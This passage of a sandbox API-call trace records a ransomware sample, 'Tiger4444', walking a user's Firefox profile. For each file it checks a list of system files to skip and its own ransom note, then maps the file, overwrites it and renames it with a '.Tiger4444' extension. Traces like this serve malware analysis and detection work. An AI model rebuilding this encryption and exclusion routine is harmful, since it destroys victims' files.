lpString2="boot") returned 1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="ids.txt") returned -1 [0050.376] lstrcmpiW (lpString1="datareporting", lpString2="NTUSER.DAT") returned -1 [0050.376] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="datareporting" | out: lpString1="datareporting") returned="datareporting" [0050.376] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0050.376] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xb0) returned 0xc73f50 [0050.376] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc66668 [0050.376] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe967070, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe967070, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfe967070, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x292e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="extensions.json", cAlternateFileName="EXTENS~1.JSO")) returned 1 [0050.376] lstrcmpiW (lpString1="extensions.json", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.376] lstrcmpiW (lpString1="extensions.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.376] lstrcmpiW (lpString1="extensions.json", lpString2="Tiger4444.exe") returned -1 [0050.376] lstrcmpiW (lpString1="extensions.json", lpString2=".") returned 1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="..") returned 1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="windows") returned -1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="bootmgr") returned 1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="pagefile.sys") returned -1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="boot") returned 1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="ids.txt") returned -1 [0050.377] lstrcmpiW (lpString1="extensions.json", lpString2="NTUSER.DAT") returned -1 [0050.377] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="extensions.json" | out: lpString1="extensions.json") returned="extensions.json" [0050.377] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json", dwFileAttributes=0x0) returned 1 [0050.377] lstrlenW (lpString="extensions.json") returned 15 [0050.377] lstrlenW (lpString="Tiger4444") returned 9 [0050.377] lstrcmpiW (lpString1="ions.json", lpString2="Tiger4444") returned -1 [0050.377] lstrlenW (lpString=".dll") returned 4 [0050.377] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0050.377] lstrlenW (lpString=".lnk") returned 4 [0050.377] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0050.377] lstrlenW (lpString=".ini") returned 4 [0050.377] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0050.377] lstrlenW (lpString=".sys") returned 4 [0050.377] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0050.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\extensions.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.377] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.377] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14183058692) returned 1 [0050.378] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=10542) returned 1 [0050.378] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0050.378] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0050.378] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2c30, lpName=0x0) returned 0x2c8 [0050.379] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2c30) returned 0xbe0000 [0050.391] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.391] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.391] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.391] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.391] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14184406980) returned 1 [0050.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0050.391] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71f28 | out: hHeap=0xc50000) returned 1 [0050.391] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.391] CloseHandle (hObject=0x2c8) returned 1 [0050.391] CloseHandle (hObject=0x260) returned 1 [0050.391] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json.Tiger4444") returned 99 [0050.391] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\extensions.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\extensions.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\extensions.json.tiger4444"), dwFlags=0x1) returned 1 [0050.392] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdd54ecc, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfdd54ecc, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x145311ab, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x500000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="favicons.sqlite", cAlternateFileName="FAVICO~1.SQL")) returned 1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="Tiger4444.exe") returned -1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2=".") returned 1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="..") returned 1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="windows") returned -1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="bootmgr") returned 1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="pagefile.sys") returned -1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="boot") returned 1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="ids.txt") returned -1 [0050.392] lstrcmpiW (lpString1="favicons.sqlite", lpString2="NTUSER.DAT") returned -1 [0050.392] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="favicons.sqlite" | out: lpString1="favicons.sqlite") returned="favicons.sqlite" [0050.392] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite", dwFileAttributes=0x0) returned 1 [0050.393] lstrlenW (lpString="favicons.sqlite") returned 15 [0050.393] lstrlenW (lpString="Tiger4444") returned 9 [0050.393] lstrcmpiW (lpString1="ns.sqlite", lpString2="Tiger4444") returned -1 [0050.393] lstrlenW (lpString=".dll") returned 4 [0050.393] lstrcmpiW (lpString1="lite", lpString2=".dll") returned 1 [0050.393] lstrlenW (lpString=".lnk") returned 4 [0050.393] lstrcmpiW (lpString1="lite", lpString2=".lnk") returned 1 [0050.393] lstrlenW (lpString=".ini") returned 4 [0050.393] lstrcmpiW (lpString1="lite", lpString2=".ini") returned 1 [0050.393] lstrlenW (lpString=".sys") returned 4 [0050.393] lstrcmpiW (lpString1="lite", lpString2=".sys") returned 1 [0050.393] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.393] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.393] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14184636464) returned 1 [0050.393] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5242880) returned 1 [0050.393] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0050.393] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0050.393] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x500300, lpName=0x0) returned 0x2c8 [0050.394] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0x100300) returned 0x30b0000 [0050.420] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x31c0000 [0050.469] UnmapViewOfFile (lpBaseAddress=0x31c0000) returned 1 [0050.485] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x200000) returned 0x31c0000 [0050.527] UnmapViewOfFile (lpBaseAddress=0x31c0000) returned 1 [0050.545] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.545] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0050.545] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.545] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0050.545] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.546] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0050.546] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.546] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0050.546] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14199875249) returned 1 [0050.546] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0050.546] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0050.546] UnmapViewOfFile (lpBaseAddress=0x30b0000) returned 1 [0050.573] CloseHandle (hObject=0x2c8) returned 1 [0050.573] CloseHandle (hObject=0x260) returned 1 [0050.573] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite.Tiger4444") returned 99 [0050.573] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite.tiger4444"), dwFlags=0x1) returned 1 [0050.574] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x72e7b76, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="favicons.sqlite-shm", cAlternateFileName="FAVICO~3.SQL")) returned 1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="Tiger4444.exe") returned -1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2=".") returned 1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="..") returned 1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="windows") returned -1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="bootmgr") returned 1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="pagefile.sys") returned -1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="boot") returned 1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="ids.txt") returned -1 [0050.574] lstrcmpiW (lpString1="favicons.sqlite-shm", lpString2="NTUSER.DAT") returned -1 [0050.574] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="favicons.sqlite-shm" | out: lpString1="favicons.sqlite-shm") returned="favicons.sqlite-shm" [0050.574] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm", dwFileAttributes=0x0) returned 1 [0050.574] lstrlenW (lpString="favicons.sqlite-shm") returned 19 [0050.574] lstrlenW (lpString="Tiger4444") returned 9 [0050.575] lstrcmpiW (lpString1="qlite-shm", lpString2="Tiger4444") returned -1 [0050.575] lstrlenW (lpString=".dll") returned 4 [0050.575] lstrcmpiW (lpString1="-shm", lpString2=".dll") returned 1 [0050.575] lstrlenW (lpString=".lnk") returned 4 [0050.575] lstrcmpiW (lpString1="-shm", lpString2=".lnk") returned 1 [0050.575] lstrlenW (lpString=".ini") returned 4 [0050.575] lstrcmpiW (lpString1="-shm", lpString2=".ini") returned 1 [0050.575] lstrlenW (lpString=".sys") returned 4 [0050.575] lstrcmpiW (lpString1="-shm", lpString2=".sys") returned 1 [0050.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-shm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.575] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.575] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14202826347) returned 1 [0050.575] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=32768) returned 1 [0050.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0050.575] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71c80 [0050.575] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x2c8 [0050.577] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0xbe0000 [0050.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0050.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0050.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0050.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0050.585] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14203833908) returned 1 [0050.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0050.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0050.585] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0050.586] CloseHandle (hObject=0x2c8) returned 1 [0050.586] CloseHandle (hObject=0x260) returned 1 [0050.586] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm.Tiger4444") returned 103 [0050.586] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-shm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-shm.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-shm.tiger4444"), dwFlags=0x1) returned 1 [0050.587] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x45aebce0, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x901d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="favicons.sqlite-wal", cAlternateFileName="FAVICO~2.SQL")) returned 1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="Tiger4444.exe") returned -1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2=".") returned 1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="..") returned 1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="windows") returned -1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="bootmgr") returned 1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="pagefile.sys") returned -1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="boot") returned 1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="ids.txt") returned -1 [0050.587] lstrcmpiW (lpString1="favicons.sqlite-wal", lpString2="NTUSER.DAT") returned -1 [0050.587] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="favicons.sqlite-wal" | out: lpString1="favicons.sqlite-wal") returned="favicons.sqlite-wal" [0050.587] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal", dwFileAttributes=0x0) returned 1 [0050.588] lstrlenW (lpString="favicons.sqlite-wal") returned 19 [0050.588] lstrlenW (lpString="Tiger4444") returned 9 [0050.588] lstrcmpiW (lpString1="qlite-wal", lpString2="Tiger4444") returned -1 [0050.588] lstrlenW (lpString=".dll") returned 4 [0050.588] lstrcmpiW (lpString1="-wal", lpString2=".dll") returned 1 [0050.588] lstrlenW (lpString=".lnk") returned 4 [0050.588] lstrcmpiW (lpString1="-wal", lpString2=".lnk") returned 1 [0050.588] lstrlenW (lpString=".ini") returned 4 [0050.588] lstrcmpiW (lpString1="-wal", lpString2=".ini") returned 1 [0050.588] lstrlenW (lpString=".sys") returned 4 [0050.588] lstrcmpiW (lpString1="-wal", lpString2=".sys") returned 1 [0050.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-wal"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0050.588] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0050.588] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14204134169) returned 1 [0050.588] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=590288) returned 1 [0050.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0050.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0050.588] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x904d0, lpName=0x0) returned 0x2c8 [0050.591] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x904d0) returned 0x2eb0000 [0050.618] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0050.618] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0050.618] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0050.618] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0050.618] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0050.618] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0050.618] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0050.618] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0050.618] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14207124016) returned 1 [0050.618] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0050.618] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0050.618] UnmapViewOfFile (lpBaseAddress=0x2eb0000) returned 1 [0050.625] CloseHandle (hObject=0x2c8) returned 1 [0050.625] CloseHandle (hObject=0x260) returned 1 [0050.625] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal.Tiger4444") returned 103 [0050.625] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-wal"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\favicons.sqlite-wal.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\favicons.sqlite-wal.tiger4444"), dwFlags=0x1) returned 1 [0050.625] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdbd76e4, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfdbd76e4, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x4079e226, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gmp", cAlternateFileName="")) returned 1 [0050.625] lstrcmpiW (lpString1="gmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="Tiger4444.exe") returned -1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2=".") returned 1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="..") returned 1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="windows") returned -1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="bootmgr") returned 1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="pagefile.sys") returned -1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="boot") returned 1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="ids.txt") returned -1 [0050.626] lstrcmpiW (lpString1="gmp", lpString2="NTUSER.DAT") returned -1 [0050.626] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="gmp" | out: lpString1="gmp") returned="gmp" [0050.626] 